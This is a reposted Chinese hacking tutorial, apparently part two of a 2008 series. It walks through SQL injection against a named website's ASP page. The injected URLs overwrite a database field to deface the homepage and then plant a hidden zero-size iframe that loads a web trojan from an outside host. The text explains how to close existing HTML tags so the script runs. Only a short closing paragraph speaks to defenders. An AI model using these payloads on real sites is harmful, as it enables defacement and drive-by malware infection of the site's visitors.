劫持数据库实现跨站攻击实例图解 (2)
2008-04-02 10:57:58来源:互联网 阅读 ()
虽然在NB中显示的是乱码,不过用IE就可以正常显示:
和原网页中的一模一样,应该就是这个地方了。为了证实,我update了数据库里这个字段的内容,使用如下命令:
| http://www.fateasia.com/fate.asp?sid=H00050';update runtext set runtext=’acked by llikz (http://www.hacker.com.cn)’;-- |
刷新网页:
看到了吗,已经成功的更新了数据库里的信息。不过如此简单的一句话就把这个网站的首页给改掉了,倒是的确让我感到有些“诧异”。下面再试着向数据库里注入恶意代码,我选择了一个网页木马:
| http://www.fateasia.com/fate.asp?sid=H00050';update runtext set runtext=’test!! 〈/a〉〈/font〉〈/marquee〉〈iframe src=http://www.hacker.com.cn/muma.htm width=0 height=0 frameborder=0〉〈/iframe〉’;-- |
其中的〈/a〉〈/font〉〈/marquee〉是为了闭合前面的html标记,以便让植入网页的脚本执行。看看结果:
再来看看源代码:
的确把恶意脚本插入到了网页中。此间有一点需要注意,要确保注入语句的正确性,否则非但不会成功,反而可能对数据库造成破坏。至此,无须得到webshell,网页木马已经被植入到原网页中了。
通过劫持数据库 来实现跨站攻击的方法确实可行,而且相对更为简便,换句话说就是危害范围会更广,也更需要网站管理人员小心防范。其实这种方法生成的网页木马隐蔽性并非很好,在插入代码后极可能会引起网页显示格式的变化,这就需要网管们不要轻易放过那些细小的安全疑点,就算是不能做到完全的防患于未然,能亡羊补牢也是好的,毕竟这种“真实网站的噩梦”还是越少越好。(
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
上一篇:DoS攻防简明问答
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash
